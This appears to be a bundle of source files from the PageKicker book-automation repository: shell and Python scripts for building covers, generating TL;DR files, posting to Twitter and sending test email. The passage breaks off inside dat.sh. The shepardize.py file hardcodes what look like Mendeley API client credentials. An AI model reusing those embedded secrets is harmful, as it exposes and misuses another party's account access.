"is_vendor": false, "language": "Python", "length_bytes": 851, "license_type": "permissive", "max_line_length": 112, "num_lines": 23, "path": "/scripts/bin/argparser.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nuniversal argparser for PageKicker\nruns at top of all bash scripts to parse positional parametters\n\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--add_this_content\", help = \"path to document filename\", default = 'none')\nparser.add_argument(\"--add_this_content_part_name\", help = \"part heading in ToC\", action = \"User-Added Content\")\n\n\nargs = parser.parse_args()\n\ninput_file = args.infile\nprint(input_file)\n\n" }, { "alpha_fraction": 0.686274528503418, "alphanum_fraction": 0.6993464231491089, "avg_line_length": 12.909090995788574, "blob_id": "d6cb94bf17759e009e2fc2610e0aaccf6be9fef5", "content_id": "da30ae39cca8463e64edd75ac85182d6a559e2da", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "permissive", "max_line_length": 40, "num_lines": 22, "path": "/scripts/pdf_input_files.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!bin/bash \n\n# pdf-based book builder\n\n# all front matter will be inserted here\n\n# loop over pdf files\n\nshopt -s nullglob\nfor f in tmp/$uuid/inputs/*.pdf\ndo\n\t#process each file\n\n\t# convert to 8.5 x 11\n\t# ocr text\n\t# run alchemy\n\t# cover builders\n\t# write metadata\n\t# build ebooks\n\t# distribute files\n\ndone\n" }, { "alpha_fraction": 0.7201017737388611, "alphanum_fraction": 0.7402622699737549, "avg_line_length": 33.74829864501953, "blob_id": "94bd11d52e19cc5c178eb1a73f5176b8e95114a7", "content_id": "68989bed957acf7889da480d1efa10d7bfe0dd34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5113, "license_type": "permissive", "max_line_length": 241, "num_lines": 147, "path": "/scripts/includes/cover-build.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"starting cover builder\" | tee --append $sfb_log\n\n# cleanup previous images\n\nrm -rf images/*\necho \"removed previous images\" | tee --append $sfb_log\n\n# creating working directories for cover production\n\nmkdir images/$uuid\n\ncd images/$uuid ; mkdir ebookcover ; echo \"created directory images/$uuid/ebookcover\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# get title straight\n\nif [ \"$customtitle\" = \"none\" ] ; then \n\t\n\tcovertitle=$titleprefix$escapeseed$titlesuffix\n\techo \"covertitle is\" $covertitle\n\techo \"titleprefix is\" $titleprefix\n\techo \"titlesuffix is\" $titlesuffix\n\techo \"escapeseed is\" $escapeseed\n\tsafecovertitle=$(echo \"$covertitle\" | sed -e 's/[[:space:]]/_/g' -e 's/[[:punct:]]/_/g' | sed -e 's/_$//')\n\techo \"safecovertitle is\" $safecovertitle\n\nelse\n\t\n\tcovertitle=$customtitle\n\nfi\n\n# get editedby 
straight\n\necho \"editedby is \" $editedby\n\n#if [ \"$customer_name\" = \"Guest\" ] ; then\n\n\n#\teditedby=\"PageKicker™\"\n#\tlastname=\"PageKicker™\"\n#\techo \"use default editedby, which is\" $editedby\n\n#else\n\n#\teditedby=$customer_name\n#\ttrue\n\n#\techo \"editedby is customer name, which is\" $customer_name\n\n#fi\n\n# decide which cover builder to use\n\necho \"covertype id is \" $covertype_id\n\ncase $covertype_id in\n\n1)\n\techo \"building default WordCloud cover\"\n\t\n\t# creates base canvases\n\n\tconvert -size 600x800 xc:$newcovercolor images/$uuid/ebookcover/canvas.png\n\tconvert -size 600x200 xc:$newcovercolor images/$uuid/ebookcover/topcanvas.png\n\tconvert -size 600x91 xc:$newcovercolor images/$uuid/ebookcover/bottomcanvas.png\n\tconvert -size 600x200 xc:$newcovercolor images/$uuid/ebookcover/toplabel.png\n\tconvert -size 600x91 xc:$newcovercolor images/$uuid/ebookcover/bottomlabel.png\n\n\t# build the Word Cloud cover\n\n\techo \"JAVA_BIN is\" $JAVA_BIN | tee --append $sfb_log\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 600 -h 800 < tmp/$uuid/cumulative.txt > images/$uuid/ebookcover/$sku\"cloud.png\" 2> /dev/null\n\n\t# build print-size Word Cloud image\n\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 2550 -h 3300 < tmp/$uuid/cumulative.txt > images/$uuid/ebookcover/$sku\"printcloud.png\" 2> /dev/null\n\n\n\t# underlay the Word Cloud cover\n\n\tcomposite -gravity Center images/$uuid/ebookcover/$sku\"cloud.png\" images/$uuid/ebookcover/canvas.png images/$uuid/ebookcover/canvas.png\n\n\t# build the canvas labels\n\n\n\t# echo \"about to build toplabel\"\n\n\techo \"newcoverfont is\" $newcoverfont\n\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size 600x200 -font \"$newcoverfont\" caption:\"$covertitle\" images/$uuid/ebookcover/topcanvas.png +swap -gravity center -composite images/$uuid/ebookcover/toplabel.png\n\n\t# echo \"about to build bottomlabel\"\n\n\tconvert -background $newcovercolor -fill \"$coverfontcolor\" -gravity center -size 600x91 \\\n\t\t -font $newcoverfont caption:\"$editedby\" \\\n\t\t images/$uuid/ebookcover/bottomcanvas.png +swap -gravity center -composite images/$uuid/ebookcover/bottomlabel.png\n\n\t# lay the labels on top of the target canvas\n\n\tcomposite -geometry +0+0 images/$uuid/ebookcover/toplabel.png images/$uuid/ebookcover/canvas.png images/$uuid/ebookcover/step1.png\n\n\tcomposite -geometry +0+600 images/$uuid/ebookcover/bottomlabel.png images/$uuid/ebookcover/step1.png images/$uuid/ebookcover/step2.png\n\t\n\tcomposite -gravity south -geometry +0+0 $userlogo images/$uuid/ebookcover/step2.png images/$uuid/ebookcover/cover.png\n\n\tconvert images/$uuid/ebookcover/cover.png -border 36 -bordercolor white images/$uuid/ebookcover/bordercover.png\n\tcp images/$uuid/ebookcover/bordercover.png images/$uuid/ebookcover/$sku\"cover.png\"\n\tcp images/$uuid/ebookcover/bordercover.png $mediatargetpath$uuid/cover.png\n\tcp images/$uuid/ebookcover/bordercover.png $mediatargetpath$uuid/$sku\"cover.png\"\n\n;;\n\n2)\n\n\n#\techo \"building a cover from a customer-supplied base image\" | tee --append $sfb_log\n#\techo \"specified cover base image is \" $coverbase | tee --append $sfb_log\n#\techo \"specified cover font is\" $coverfont| tee --append $sfb_log\n#\techo \"specified cover color is \" $newcovercolor | tee --append $sfb_log\n#\tcp \"$coverbase\" 
\"images/$uuid/canvas.png\" | tee --append $sfb_log\n#\t\n#\t\n#\t# creates base canvas\n#\t\n#\tconvert -size 600x800 images/$uuid/canvas.png\n#\t\n\n#\t# build the canvas labels\n\n#\tconvert -background '#0008' -fill \"$newcovercolor\" -gravity center -size 600x200 \\\n#\t\t caption:\"$covertitle\" -pointsize 24 -font \"$newcoverfont\" \\\n#\t\t\t images/$uuid/topcanvas.png +swap -gravity north -composite images/$uuid/canvas.png\n\n#\tconvert -background '#0008' -fill \"$coverfontcolor}\" -gravity center -size 600x80 \\\n#\t\t caption:\"$edited_by\" -pointsize 20 -font \"$newcoverfont\" \\\n#\t\t images/$uuid/bottomcanvas.png +swap -gravity south -composite images/$uuid/canvas.png\n\n#\t# lay the labels on top of the target canvas\n\n#\tcomposite -gravity south +0+0 assets/PK.png images/$uuid/canvas.png images/$uuid/$sku\".png\"\n\n;;\n\n*)\n\techo \"invalid cover type id was \" $covertype_id | tee --append $xform_log\n\texit 1;;\n\nesac\n\n" }, { "alpha_fraction": 0.6529157757759094, "alphanum_fraction": 0.6548596024513245, "avg_line_length": 29.873332977294922, "blob_id": "8d6535ba085c6f2c67b34ba64c507bbba216f666", "content_id": "47aa4b734be99db52c90bea5a8d3a156680e0c12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4630, "license_type": "permissive", "max_line_length": 95, "num_lines": 150, "path": "/scripts/bin/twitter-test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\n'''Post a message to twitter'''\n\n__author__ = '[email protected]'\n\n\ntry:\n import configparser\nexcept ImportError as _:\n import configparser as configparser\n\nimport getopt\nimport os\nimport sys\nimport twitter\nimport argparse\n\n\n\nUSAGE = '''Usage: tweet [options] message\n This script posts a message to Twitter.\n Options:\n -h --help : print this help\n --consumer-key : the twitter consumer key\n --consumer-secret : the twitter consumer secret\n --access-key : the twitter access token key\n --access-secret : the twitter access token secret\n --encoding : the character set encoding used in input strings, e.g. \"utf-8\". [optional]\n --message : file containing text message up to 280 characters\n --image: attached image\n Documentation:\n If either of the command line flags are not present, the environment\n variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your\n consumer_key or consumer_secret, respectively.\n If neither the command line flags nor the environment variables are\n present, the .tweetrc file, if it exists, can be used to set the\n default consumer_key and consumer_secret. 
The file should contain the\n following three lines, replacing *consumer_key* with your consumer key, and\n *consumer_secret* with your consumer secret:\n A skeletal .tweetrc file:\n [Tweet]\n consumer_key: *consumer_key*\n consumer_secret: *consumer_password*\n access_key: *access_key*\n access_secret: *access_password*\n'''\n\n\ndef PrintUsageAndExit():\n print(USAGE)\n sys.exit(2)\n\n\ndef GetConsumerKeyEnv():\n return os.environ.get(\"TWEETUSERNAME\", None)\n\n\ndef GetConsumerSecretEnv():\n return os.environ.get(\"TWEETPASSWORD\", None)\n\n\ndef GetAccessKeyEnv():\n return os.environ.get(\"TWEETACCESSKEY\", None)\n\n\ndef GetAccessSecretEnv():\n return os.environ.get(\"TWEETACCESSSECRET\", None)\n\n\nclass TweetRc(object):\n def __init__(self):\n self._config = None\n\n def GetConsumerKey(self):\n return self._GetOption('consumer_key')\n\n def GetConsumerSecret(self):\n return self._GetOption('consumer_secret')\n\n def GetAccessKey(self):\n return self._GetOption('access_key')\n\n def GetAccessSecret(self):\n return self._GetOption('access_secret')\n\n def _GetOption(self, option):\n try:\n return self._GetConfig().get('Tweet', option)\n except:\n return None\n\n def _GetConfig(self):\n if not self._config:\n self._config = configparser.ConfigParser()\n self._config.read(os.path.expanduser('~/.tweetrc'))\n return self._config\n\n\ndef main():\n try:\n shortflags = 'h'\n longflags = ['help', 'consumer-key=', 'consumer-secret=',\n 'access-key=', 'access-secret=', 'encoding=']\n opts, args = getopt.gnu_getopt(sys.argv[1:], shortflags, longflags)\n except getopt.GetoptError:\n PrintUsageAndExit()\n consumer_keyflag = None\n consumer_secretflag = None\n access_keyflag = None\n access_secretflag = None\n encoding = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n PrintUsageAndExit()\n if o in (\"--consumer-key\"):\n consumer_keyflag = a\n if o in (\"--consumer-secret\"):\n consumer_secretflag = a\n if o in (\"--access-key\"):\n access_keyflag = a\n if o in (\"--access-secret\"):\n access_secretflag = a\n if o in (\"--encoding\"):\n encoding = a\n message = ' '.join(args)\n if not message:\n PrintUsageAndExit()\n rc = TweetRc()\n consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()\n consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()\n access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()\n access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()\n if not consumer_key or not consumer_secret or not access_key or not access_secret:\n PrintUsageAndExit()\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_key, access_token_secret=access_secret,\n input_encoding=encoding)\n try:\n status = api.PostUpdate(message)\n except UnicodeDecodeError:\n print(\"Your message could not be encoded. Perhaps it contains non-ASCII characters? 
\")\n print(\"Try explicitly specifying the encoding with the --encoding flag\")\n sys.exit(2)\n\n print(\"{0} just posted: {1}\".format(status.user.name, status.text))\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6751739978790283, "avg_line_length": 28.363636016845703, "blob_id": "d445341c634d2b5c1791ff76c2e3e85ce4c5fd03", "content_id": "3ca9adb4cf2f7291c1bcaed8b6cc779e80d471a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1293, "license_type": "permissive", "max_line_length": 259, "num_lines": 44, "path": "/test/import.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash \n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print uuid.uuid1()')\n\t#echo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Paella\" --yourname \"Manuel\" --jobprofilename \"default\" --import \"yes\" --passuuid \"$uuid\" --seedfile \"seeds/paella\" --imprint \"pagekicker\" --analyze_url \"none\" --summary \"summaries_only\" --pricing \"yes\"\n\n# tests begin here\n\nif [ ! -f \"$TMPDIR$uuid/ebookcover.jpg\" ]; then\n echo \"error: cover not found! \" > \"$TMPDIR$uuid/test.log\"\nfi\n\nif [ ! -f $metadatatargetpath$uuid\"/current-import.csv\" ] ; then\n\techo \"error: no import file found\" >> \"$TMPDIR$uuid/test.log\"\nelse\n\techo \"import file found, price was $price\"\nfi\n\n# if error log is empty then PASS\n\necho \"PASS\" \" $uuid\" | tee -a $LOCAL_DATA/logs/error.log\n\n" }, { "alpha_fraction": 0.7683615684509277, "alphanum_fraction": 0.790960431098938, "avg_line_length": 58, "blob_id": "53dc83ff25fd1a4b767cb7f9ef8a90e7e3397a7d", "content_id": "29b88c97e60175332f3d3024f08eba904a17ed3d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "permissive", "max_line_length": 150, "num_lines": 3, "path": "/conf/jobprofiles/imprints/pagekicker/pagekicker_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About PageKicker Press\n\nPageKicker is the world's leading publisher of algorithmically created books. 
It was founded by Fred Zimmerman in Ann Arbor, Michigan, USA in September 2012.\n" }, { "alpha_fraction": 0.6028985381126404, "alphanum_fraction": 0.616425096988678, "avg_line_length": 37.33333206176758, "blob_id": "b276256314542e0c4b80ec95cf0bae3d70d5c227", "content_id": "97d9afc535b7e9916d22cb359f8bd1c2cceae77b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1035, "license_type": "permissive", "max_line_length": 81, "num_lines": 27, "path": "/scripts/includes/tldr_auto.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# returns tldr.txt & tldr.md\nif [ -z \"$tldr\" ] ; then\n\techo \"no tldr supplied, generate automatically\"\n\techo \"TL;DR: \"\"$tldr\" > $TMPDIR$uuid/tldr.txt\n echo \" \" > $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \"# TL;DR: \"\"$tldr\" >> $TMPDIR$uuid/tldr.md\n\tsed -n 1p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-72 >> $TMPDIR$uuid/tldr.txt\n sed -n 1p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-72 >> $TMPDIR$uuid/tldr.md\n\t# 60 was not enough, 80 would be a full line, 72 is conventional\n\techo \"automatically generated tldr is $TMPDIR$uuid/tldr.txt\"\n echo \"...\" >> $TMPDIR$uuid/tldr.txt\n echo \"...\" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n\nelse\n\techo \"TL;DR: \"\"$tldr\" > $TMPDIR$uuid/tldr.txt\n echo \" \" > $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \"# TL;DR: \"\"$tldr\" >> $TMPDIR$uuid/tldr.md\n echo \"...\" >> $TMPDIR$uuid/tldr.txt\n echo \"...\" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n\nfi\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.728205144405365, "avg_line_length": 40.78571319580078, "blob_id": "92f87f7fca9229499d5c9f4cae1f433b8c8a14be", "content_id": "ff3c6181f38a2c610b29c7c8d22eb5438c548625", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 585, "license_type": "permissive", "max_line_length": 94, "num_lines": 14, "path": "/scripts/bin/covertemplate.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\neditedby=\"Vincent P. 
O'Hara\"\ncovertitle=\"The Royal Navy's Revenge and Other Little-Known Encounters of the War at Sea\" \n./bin/standalone-print.sh \\\n--ISBN \"9781608881130\" \\\n--shorttitle \"Encounters of the War at Sea\" \\\n--imprintname \"Nimble Books LLC\" \\\n--spineinches \"0.313\" \\\n--pdfpath \"/home/fred/share/978-1-60888-113-0_txt_OHARA_v15.pdf\" \\\n--userimage \"/home/fred/Downloads/Dhonburi_kohchang.tif\" \\\n--usercaption \"The Thai ship Dhonburi under French fire at the battle of Koh Chang in 1941.\" \\\n--editedby \"$editedby\" \\\n--covertitle \"$covertitle\" \\\n--covertype \"imagefrontcenter\"\n" }, { "alpha_fraction": 0.6281055808067322, "alphanum_fraction": 0.64402174949646, "avg_line_length": 13.959301948547363, "blob_id": "689c6e951fe1ee3590129aa3fd013303194b9cf0", "content_id": "4ce51d637b0f84b755f39a6948f1c5bc1b84a33d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2576, "license_type": "permissive", "max_line_length": 97, "num_lines": 172, "path": "/scripts/louella.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# manages publicity for a book or robot\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\n\n. includes/set-variables\n\nif [ \"$environment\" = \"Production\" ] ; then\n\n . /opt/bitnami/apache2/htdocs/pk-production/production/conf/config.txt\n echo \"running prod config\" > ~/which_xform\n\nelse\n\n . /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n echo \"running dev config\" > ~/which_xform\n\nfi\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\necho \"PATH is\" $PATH\n# default values\n\nfb_on=\"no\"\n\n# command line processing \n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--shorttitle)\nshorttitle=$2\nshift 2\n;;\n--shorttitle=*)\nshorttitle=${1#*=}\nshift\n;;\n--shortname)\nshortname=$2\nshift 2\n;;\n--shortname=*)\nshortname=${1#*=}\nshift\n;;\n--shorturl)\nshorturl=$2\nshift 2\n;;\n--shorturl=*)\nshorturl=${1#*=}\nshift\n;;\n--interval)\ninterval=$2\nshift 2\n;;\n--interval=*)\ninterval=${1#*=}\nshift \n;;\n--shortmsg)\nshortmsg=$2\nshift 2\n;;\n--shortmsg=*)\nshortmsg=${1#*=}\nshift\n;;\n--shortmsg_after)\nshortmsg_after=$2\nshift 2\n;;\n--shortmsg_after=*)\nshortmsg_after=${1#*=}\nshift\n;;\n--longmsg)\nlongmsg=$2\nshift 2\n;;\n--longmsg=*)\nlongmsg=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--fb_on)\nfb_on=$2\nshift 2\n;;\n--fb_on=*)\nfb_on=${1#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\n#if [ ! \"$shorturl\" ]; then\n# echo \"ERROR: option '--shorturl' not given. See --help\" >&2\n# exit 1\n#fi\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n# file processing begins\n\n# while csv file\n\n\n\nt update \"$shortmsg $shortname $shorttitle $shorturl $robot_credit $shortmsg_after $longmsg\"\n\nif [ \"$fb_on\" = \"yes\" ] ; then\n\n\tfbcmd status \"$longmsg $shortmsg $shortname $shorttitle $shorturl $robot_credit $shortmsg_after\"\n\nelse\n\techo \"no fb post\"\n\nfi\n\n# mailchimp?\n\n\n# done<../conf/publicity_bots/watch_files/watch_titles.csv\nexit\n0\n\n\n\n" }, { "alpha_fraction": 0.7177335023880005, "alphanum_fraction": 0.746065080165863, "avg_line_length": 21.13953399658203, "blob_id": "846ab70ebf173dc692f50468052d3da0c85cc04a", "content_id": "843e1df06603dec20926a6b29fd19da577c7e83b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 953, "license_type": "permissive", "max_line_length": 84, "num_lines": 43, "path": "/scripts_python_3/bin/shepardize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n# Mendeley API \"Shepardize for Scientists\"\n\n# check for updated citations to articles cited in bibliography\n\n# task flow\n\n\t# authenticate to Mendeley\n\n\t# select group\n\n\t# select \"update since\" date\n\n\t# for i = 1 to (documents in group)\n\n\t\t# search for n documents related to i and date gt update since\n\n\t\t# if n > 0 increment docsupdated counter by 1 and increment totaldocstoreview by n\n\n\t\t# save documents 1...n in group (subgroup for review)\n\n\t\t# save document titles 1...n to file\n\n\t# report\n\n\t\t#checked n documents from group name\n\n\t\t# there were new citations related to docsupdated\n\n\t\t# totalsdocs to review have been added to group(for review)\n\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\ntry:\n mendeley.load_keys()\nexcept IOError:\n\tmendeley.get_required_keys()\n\tmendeley.save_keys()\n\n\nfolders = mendeley.group_folders(groupId)\npprint(folders)\n" }, { "alpha_fraction": 0.6370370388031006, "alphanum_fraction": 0.7481481432914734, "avg_line_length": 14, "blob_id": "b8fe1009da34e099dc1aeca9d74c80822e45273e", "content_id": "1633889f87c349ed6104371c33348223ded41e83", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 136, "license_type": "permissive", "max_line_length": 55, "num_lines": 9, "path": "/conf/jobprofiles/imprints/wapacklabs/wapacklabscopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Wapack Labs\n\[email protected]\n\n326 Chestnut Hill Road, Suite 400\n\nNew Boston, NH 03070\n\nCopyright © 2016 Wapack Labs, Inc. 
All rights reserved\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.8387096524238586, "avg_line_length": 30, "blob_id": "08b0f661bda0fc48c59d9b7f90fbd469e1651089", "content_id": "82c23afe46d220e06a6bc99ab047727206e28997", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 30, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/HG572.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Military History 1870 to today\n" }, { "alpha_fraction": 0.6415525078773499, "alphanum_fraction": 0.6506849527359009, "avg_line_length": 21.461538314819336, "blob_id": "11e94917425e30dd2601f61b273c2f7946c791ba", "content_id": "f962e395c495f66419c06075bd19fc4f74a8d4c8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 876, "license_type": "permissive", "max_line_length": 93, "num_lines": 39, "path": "/test/sendemail-tester.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# tests whether sendemail is working on this system\n# assumes existence of .pagekicker/config.txt file\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\necho \"software version number is\" $SFB_VERSION\n\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n\n. includes/set-variables.sh\n\nsendemail -t \"[email protected]\" \\\n\t\t-u \"test email\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a ../test/tmpbody.md \\\n\t\t-o message-file=\"../test/emailbody\" \\\n\t\t-vv\n\t\nexit 0\n" }, { "alpha_fraction": 0.7016411423683167, "alphanum_fraction": 0.712841272354126, "avg_line_length": 32.00898742675781, "blob_id": "b4b62f4f2821e2a20b30269a1dc272d497341b57", "content_id": "d9abdd6cc40e31dced0f2ec6e4fdfda18551c1cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 25714, "license_type": "permissive", "max_line_length": 341, "num_lines": 779, "path": "/scripts/dat.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# stand-alone version of xform.sh routine that\n# extracts, analyzes, and summarizes images from permissioned PDF documents\n\n# requires pdfimages, imagemagick, fdupes\n\n\n# input: PDF file OR url\n# output: unique jpgs, zip, montage\n\n#defaults before command line\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. 
/home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n\nsource ~/.bashrc\nstarttime=$(( `date +%s` ))\n\nxformlog=\"$logdir$uuid\"/xform_log\n\necho \"-D-D-D-D-D-D-D-D\" | tee --append $sfb_log\necho \"starting Document Analysis Tools Stand-alone\"\n\n\n# default values\ndat=\"yes\"\n\n# checking parameter passing\n\necho \"parameter 1 is \" $1\necho \"parameter 2 is\" $2\necho \"parameter 3 is\" $3\necho \"parameter 4 is\" $4\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: dat.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--maximages)\nmaximages=$2\nshift 2\n;;\n--maximages=*)\nmaximages=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--montageurdir)\nmontageurdir=$2\nshift 